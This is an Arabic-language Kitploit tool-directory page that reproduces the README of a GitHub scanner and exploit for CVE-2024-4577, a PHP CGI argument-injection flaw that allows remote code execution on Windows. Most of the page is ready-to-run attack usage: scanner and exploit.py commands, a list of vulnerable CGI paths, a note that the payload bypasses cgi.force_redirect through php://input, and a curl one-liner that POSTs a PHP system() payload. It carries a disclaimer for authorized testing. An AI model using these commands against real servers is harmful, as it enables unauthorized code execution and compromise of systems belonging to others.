Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-4577 — أداة ماسح واستغلال لـ CVE-2024-4577، ثغرة حقن وسائط PHP CGI تتيح تنفيذ كود عن بُعد على أنظمة Windows. تتضمن وحدات اكتشاف وتنفيذ أوامر. | Kitploit
أدوات/GitHubGitHub/r0otk3r/cve-2024-4577
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليم
GitHubr0otk3r/cve-2024-4577

CVE-2024-4577

أداة ماسح واستغلال لـ CVE-2024-4577، ثغرة حقن وسائط PHP CGI تتيح تنفيذ كود عن بُعد على أنظمة Windows. تتضمن وحدات اكتشاف وتنفيذ أوامر.

عرض المستودع
3منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-4577 - حقن وسائط PHP CGI وتنفيذ الأوامر عن بُعد (RCE)

ملخص

CVE-2024-4577 هي ثغرة حقن وسائط في PHP CGI حرجة تؤثر على أنظمة ويندوز التي تشغّل PHP في وضع CGI. تسمح هذه الثغرة للمهاجمين عن بُعد بحقن وسائط في سطر أوامر PHP عبر عناوين URL مصممة خصيصًا، مما يؤدي إلى تنفيذ الأوامر عن بُعد (RCE).

يحتوي هذا المستودع على:

  • CVE-2024-4577.py: ماسح ضوئي لاكتشاف الأهداف المعرّضة للخطر.
  • exploit.py: أداة استغلال ترسل كود PHP وتنفّذ أوامر النظام على الخادم المعرّض للخطر.

⚠️ إخلاء مسؤولية
هذا المشروع مخصص للأغراض التعليمية والاختبار المصرح به فقط. أي إساءة استخدام لهذا الكود ليست مسؤولية المؤلف. استخدمه بمسؤولية وفي البيئات التي تملكها أو لديك إذن صريح لاختبارها فقط.


المتطلبات

  • Python 3.x
  • مكتبة requests

ثبّت التبعيات:

root@kitploit:~
pip install -r requirements.txt

استخدام الماسح الضوئي

اكتشف ما إذا كان الهدف معرّضًا لـ CVE-2024-4577:

هدف واحد

root@kitploit:~
python3 CVE-2024-4577.py -u http://target.com

1

أهداف متعددة من ملف

root@kitploit:~
python3 CVE-2024-4577.py -f urls.txt

2

مسار مخصص (اختياري)

root@kitploit:~
python3 CVE-2024-4577.py -u http://target.com -p /custom/path.php

أمثلة على المسارات المعرّضة للخطر

يختبر الماسح الضوئي وأداة الاستغلال نقاط نهاية CGI الشائعة مثل:

root@kitploit:~
/php-cgi/php-cgi.exe
/index.php
/test.php
/test.hello

يتجاوز الحمولة cgi.force_redirect ويضيف PHP خبيثًا في البداية باستخدام php://input.


استخدام أداة الاستغلال

نفّذ أوامر نظام تعسفية على هدف معرّض للخطر:

هدف واحد

root@kitploit:~
python3 exploit.py -u http://target.com -c "id"

4

أهداف متعددة من ملف

root@kitploit:~
python3 exploit.py -f urls.txt -c "id"

5

استخدام curl

يمكنك أيضًا استغلال الثغرة يدويًا باستخدام curl

root@kitploit:~
curl -X POST http://target.com/php-cgi/php-cgi.exe -d "<?php system('uname -a'); ?>"

يرسل هذا حمولة PHP تنفّذ uname -a على الخادم وتعيد المخرجات.

3

الترخيص

تم إصدار هذا الكود بموجب رخصة MIT. راجع LICENSE لمزيد من المعلومات.


القنوات الرسمية

  • YouTube @rootctf
  • X @r0otk3r
تنزيل الأداة